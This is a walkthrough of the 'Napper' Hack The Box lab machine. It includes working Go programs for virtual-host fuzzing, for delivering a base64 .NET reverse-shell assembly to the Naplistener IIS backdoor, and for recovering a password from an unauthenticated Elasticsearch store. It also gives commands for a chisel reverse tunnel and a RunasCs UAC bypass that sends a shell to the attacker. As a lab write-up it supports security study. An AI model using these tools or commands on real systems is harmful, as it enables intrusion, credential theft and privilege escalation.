In this post, I would like to share a walkthrough of the Napper machine from Hack The Box.

Napper is rated as a Hard machine on Hack The Box.

What will you gain from the Napper machine?

For the user flag, you start by locating a username and password that are mentioned in a blog post and use them to get into an internal blog platform. That platform discusses a real-world IIS backdoor known as Naplistener and explains how to run it locally. With that description I will locate Naplistener on the box and build a tailored .NET binary. Naplistener loads and runs that binary when it is posted to the backdoor, which gives us a shell.

For the root flag, you need an earlier blog post describing an in-house replacement for LAPS, which stores passwords in a local Elasticsearch instance. I will write a Go program that retrieves both the seed and the encrypted blob, regenerates the key from the seed and uses it to decrypt the blob, revealing the password of an admin-level user. Finally, I will use RunasCs.exe to get around UAC and obtain a shell with administrator privileges.

Information Gathering on Napper Machine

After connecting to the VPN (the .ovpn file is downloaded from Hack The Box), we can start enumerating the target.

└──╼ $ nmap -sC -sV -oA initial 
Starting Nmap 7.93 ( ) at 2023-11-13 23:09 EST
Nmap scan report for
Host is up (0.47s latency).
Not shown: 998 filtered tcp ports (no-response)
80/tcp  open  http       Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://app.napper.htb
443/tcp open  ssl/https?
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=app.napper.htb/organizationName=MLopsHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:app.napper.htb
| Not valid before: 2023-06-07T14:58:55
|_Not valid after:  2033-06-04T14:58:55
|_ssl-date: 2023-11-14T04:10:15+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 64.52 seconds
└──╼ $ 

Let's open the web interface in a browser.

Browsing to the IP directly gives a broken-looking page: IIS redirects to https://app.napper.htb (nmap's http-title already showed this) and that name does not resolve yet. Add it to /etc/hosts.

With the hosts entry in place, https://app.napper.htb renders properly.

The site is generated by Hugo, which is visible in the HTML source.

Directory enumeration is not very useful here, because almost every request is answered with a redirect to app.napper.htb, i.e. the static Hugo content.

Virtual-host enumeration with gobuster on port 80 finds nothing either.

Port 443 is also open, and the certificate's SAN only names app.napper.htb, so let's repeat the vhost enumeration over HTTPS (skipping certificate verification and filtering out the wildcard baseline response). This reveals internal.napper.htb.
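The following Go program is an added example, not part of the original post, that does by hand what gobuster's vhost mode does over HTTPS: it requests the target IP with a candidate Host header and reports only names whose answer differs from the wildcard baseline. The target IP, the domain and the wordlist path are arguments, and the baseline name doesnotexist-<domain> is an assumption about what a non-existent vhost looks like.

```go
package main

import (
	"bufio"
	"crypto/tls"
	"fmt"
	"io"
	"net/http"
	"os"
	"time"
)

// probe holds the two response features compared during vhost fuzzing.
type probe struct {
	status int
	length int
}

func abs(n int) int {
	if n < 0 {
		return -n
	}
	return n
}

// differs reports whether a candidate vhost answered differently from the
// wildcard baseline. A different status code always counts (an auth-protected
// vhost answers 401 where the catch-all redirects); a body-length difference
// only counts beyond tolerance, because a redirect body usually echoes the
// requested host name and therefore drifts by a few bytes per candidate.
func differs(baseline, p probe, tolerance int) bool {
	return p.status != baseline.status || abs(p.length-baseline.length) > tolerance
}

// fetch sends one HTTPS request to ip with the Host header set to host and
// returns the status and body length. Redirects are not followed, so the
// catch-all's 3xx is observed as-is instead of the page it points to.
func fetch(client *http.Client, ip, host string) (probe, error) {
	req, err := http.NewRequest(http.MethodGet, "https://"+ip+"/", nil)
	if err != nil {
		return probe{}, err
	}
	req.Host = host
	resp, err := client.Do(req)
	if err != nil {
		return probe{}, err
	}
	defer resp.Body.Close()
	n, err := io.Copy(io.Discard, resp.Body)
	if err != nil {
		return probe{}, err
	}
	return probe{status: resp.StatusCode, length: int(n)}, nil
}

func main() {
	if len(os.Args) != 4 {
		fmt.Fprintln(os.Stderr, "usage: vhostfuzz <ip> <domain> <wordlist>")
		os.Exit(1)
	}
	ip, domain, wordlist := os.Args[1], os.Args[2], os.Args[3]

	client := &http.Client{
		Timeout: 10 * time.Second,
		// The box uses a self-signed certificate; skipping verification is lab-only.
		Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}},
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}

	// Baseline: a name that certainly does not exist, so its response is the wildcard behaviour.
	baseline, err := fetch(client, ip, "doesnotexist-"+domain)
	if err != nil {
		fmt.Fprintln(os.Stderr, "baseline request failed:", err)
		os.Exit(1)
	}

	f, err := os.Open(wordlist)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	defer f.Close()

	sc := bufio.NewScanner(f)
	for sc.Scan() {
		host := sc.Text() + "." + domain
		p, err := fetch(client, ip, host)
		if err != nil {
			continue
		}
		if differs(baseline, p, len(host)) {
			fmt.Printf("%-40s status=%d length=%d\n", host, p.status, p.length)
		}
	}
}
```

Run it as vhostfuzz <ip> napper.htb subdomains.txt. The point of the baseline request is that IIS answers every unknown Host with the same redirect, so without it every wordlist entry would look like a hit; the tolerance on the body length is there because that redirect embeds the requested host name.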

Add internal.napper.htb to /etc/hosts and open it: it prompts for a username and password.

Those credentials are probably somewhere on app.napper.htb, so let's read through its posts.

Most posts contain nothing of interest.

One post on the last page, however, includes PowerShell commands that embed a username and password in clear text.

Enter those credentials at the internal.napper.htb prompt.

We now have access to the internal.napper.htb site.

Naplistener vulnerability

The post on internal.napper.htb describes Naplistener, an HTTP listener backdoor, and includes the web request it responds to; that is what we investigate next.

Open the page and capture the request in Burp Suite.

Change the method from GET to POST and add the form parameter sdafwe3ree23= to the body. The response changes to Found, which shows the listener is present and is parsing that parameter.

Naplistener base64-decodes the value of that parameter and loads it as a .NET assembly, so we write a small C# program whose Run class launches a reverse shell from its constructor (Run is the entry point Naplistener instantiates; any other class name is ignored), and compile the .cs file into an executable (for example with mcs on Linux).

Once compiled, base64-encode the binary (base64 -w0 payload.exe).

Paste the base64 string as the value of sdafwe3ree23 in the POST body and URL-encode it (Ctrl+U in Burp). This step is easy to skip and breaks the attack: base64 contains +, / and =, and an unencoded + is decoded as a space by the form parser, which corrupts the assembly so nothing runs. Sending the encoded request triggers the reverse shell.

Any file the payload needs to fetch is served from a Python HTTP server on the attacking machine, which must be running, together with the listener, before the request is sent.
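The delivery steps above (base64-encode the assembly, URL-encode it, POST it as sdafwe3ree23) as an added Go example; this is not the post's code or Naplistener's. The request path /ews/MsExgHealthCheckd/ is taken from public analysis of Naplistener rather than from this post, so confirm it against the request shown on internal.napper.htb; the base URL and payload file are command-line arguments. recoverAssembly is an approximation of the receiving side, included to show what goes wrong when the URL-encoding step is skipped.

```go
package main

import (
	"crypto/tls"
	"encoding/base64"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"strings"
)

// naplistenerPath is the request path the backdoor serves. Assumed from public
// analysis of Naplistener, not from this post; verify it on the box.
const naplistenerPath = "/ews/MsExgHealthCheckd/"

// formField is the POST parameter whose value Naplistener base64-decodes and
// loads as a .NET assembly.
const formField = "sdafwe3ree23"

// buildPayloadBody base64-encodes a compiled assembly and form-encodes it.
// url.Values.Encode percent-encodes '+', '/' and '=', all of which base64 uses;
// a raw '+' would be form-decoded as a space and corrupt the assembly.
func buildPayloadBody(assembly []byte) string {
	v := url.Values{}
	v.Set(formField, base64.StdEncoding.EncodeToString(assembly))
	return v.Encode()
}

// recoverAssembly approximates the receiving side: form-decode the body, then
// base64-decode the field. Feed it an unencoded body to see the corruption.
func recoverAssembly(body string) ([]byte, error) {
	form, err := url.ParseQuery(body)
	if err != nil {
		return nil, err
	}
	return base64.StdEncoding.DecodeString(form.Get(formField))
}

// sendPayload POSTs the body to the backdoor. The box's certificate is
// self-signed, so verification is disabled; that is acceptable only in the lab.
func sendPayload(base, body string) (int, error) {
	client := &http.Client{Transport: &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}}
	req, err := http.NewRequest(http.MethodPost, base+naplistenerPath, strings.NewReader(body))
	if err != nil {
		return 0, err
	}
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	resp, err := client.Do(req)
	if err != nil {
		return 0, err
	}
	defer resp.Body.Close()
	_, _ = io.Copy(io.Discard, resp.Body)
	return resp.StatusCode, nil
}

func main() {
	if len(os.Args) != 3 {
		fmt.Fprintln(os.Stderr, "usage: nappost https://internal.napper.htb payload.exe")
		os.Exit(1)
	}
	assembly, err := os.ReadFile(os.Args[2])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	status, err := sendPayload(os.Args[1], buildPayloadBody(assembly))
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Println("response status:", status)
}
```

Start the reverse-shell listener first, then run nappost https://internal.napper.htb payload.exe. The status code printed is only a sanity check; the real signal is the shell connecting back.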

Boom! The reverse shell connects back to us.

We can read the user flag with the "type user.txt" command.

Escalate to Root Privileges Access

Let's look at the files under C:\TEMP\www\Internal\content\posts, where the source of the internal blog lives.

One post references an Elasticsearch URI on port 9200.

The same file holds more details on the Elastic setup: the in-house LAPS replacement stores the encrypted password of a user, and the seed used to derive the key, in Elasticsearch.

Port 9200 is only reachable from the box itself, so we forward it with chisel. Start the chisel server on the attacking machine with --reverse (chisel server -p 8000 --reverse).

Then start the chisel client on the victim (chisel client <attacker-ip>:8000 R:9200:127.0.0.1:9200) so that localhost:9200 on our machine reaches Elasticsearch on the box.

Elasticsearch 8.8.0 is installed under Program Files.

Listing the indices shows two of interest: seed and user-00001.

Browse to http://localhost:9200 through the forward.

The Elasticsearch instance answers unauthenticated requests, and the _search endpoint of each index returns its documents: the seed index holds the seed, and user-00001 holds the encrypted password blob of the backup user.

The post describes how to decrypt the data stored in Elasticsearch: the key is generated from the seed, and the blob is decrypted with that key to retrieve the most recent password of the backup user.
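An added Go example of that decryption, not the post's program and not the box's own source. Several details are assumptions to check against the post on the box: that the key is 16 bytes drawn from Go's math/rand seeded with the stored seed (r.Intn(254)+1 per byte), that the blob is base64(IV || AES-128-CFB ciphertext), that the documents use the field names seed and blob, and that Elasticsearch is reachable unauthenticated at 127.0.0.1:9200 through the chisel forward. encryptBlob is the matching forward direction, included only so the decryptor can be checked offline against a constructed blob.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	crand "crypto/rand"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"log"
	mrand "math/rand"
	"net/http"
)

const esBase = "http://127.0.0.1:9200" // Elasticsearch through the chisel forward (assumed)

// deriveKey reproduces the assumed key schedule: math/rand seeded with the
// stored seed, 16 draws of a non-zero byte. math/rand is deterministic, so
// anyone who can read the seed can rebuild the key; that is the weakness.
func deriveKey(seed int64) []byte {
	r := mrand.New(mrand.NewSource(seed))
	key := make([]byte, 16)
	for i := range key {
		key[i] = byte(r.Intn(254) + 1)
	}
	return key
}

// decryptBlob reverses the assumed format base64(IV || AES-128-CFB ciphertext).
func decryptBlob(key []byte, b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw) < aes.BlockSize {
		return "", fmt.Errorf("blob is %d bytes, shorter than the %d-byte IV", len(raw), aes.BlockSize)
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCFBDecrypter(block, iv).XORKeyStream(pt, ct)
	return string(pt), nil
}

// encryptBlob is the forward direction, used only to build a test blob offline.
func encryptBlob(key []byte, plaintext string) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	raw := make([]byte, aes.BlockSize+len(plaintext))
	if _, err := crand.Read(raw[:aes.BlockSize]); err != nil {
		return "", err
	}
	cipher.NewCFBEncrypter(block, raw[:aes.BlockSize]).XORKeyStream(raw[aes.BlockSize:], []byte(plaintext))
	return base64.StdEncoding.EncodeToString(raw), nil
}

// firstSource returns the _source of the first hit in an index.
func firstSource(index string) (map[string]any, error) {
	resp, err := http.Get(esBase + "/" + index + "/_search")
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	var res struct {
		Hits struct{ Hits []struct{ Source map[string]any `json:"_source"` } `json:"hits"` } `json:"hits"`
	}
	dec := json.NewDecoder(resp.Body)
	dec.UseNumber() // keep the seed exact instead of rounding it through float64
	if err := dec.Decode(&res); err != nil {
		return nil, err
	}
	if len(res.Hits.Hits) == 0 {
		return nil, fmt.Errorf("index %s has no documents", index)
	}
	return res.Hits.Hits[0].Source, nil
}

func main() {
	seedDoc, err := firstSource("seed")
	if err != nil {
		log.Fatal(err)
	}
	seedNum, _ := seedDoc["seed"].(json.Number) // field name assumed
	seed, err := seedNum.Int64()
	if err != nil {
		log.Fatalf("seed field missing or not an integer: %v", err)
	}
	userDoc, err := firstSource("user-00001")
	if err != nil {
		log.Fatal(err)
	}
	blob, _ := userDoc["blob"].(string) // field name assumed
	password, err := decryptBlob(deriveKey(seed), blob)
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println("password:", password)
}
```

If user-00001 holds several documents, take the newest one rather than the first hit, since the post says the most recent password is the valid one. The UseNumber call matters because a seed larger than 2^53 would be silently rounded if decoded as float64, and a wrong seed produces a wrong key with no error, only garbage output.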

Let's upload RunasCs.exe to the victim.

The backup user is admin-level, but a plain logon with its password would give a UAC-filtered token, so run RunasCs with --bypass-uac and have it send a shell to our listener, for example: RunasCs.exe backup '<password>' cmd.exe -r <attacker-ip>:<port> --bypass-uac

After a moment, the reverse shell connects back to us.

We can read the root flag with the "type root.txt" command.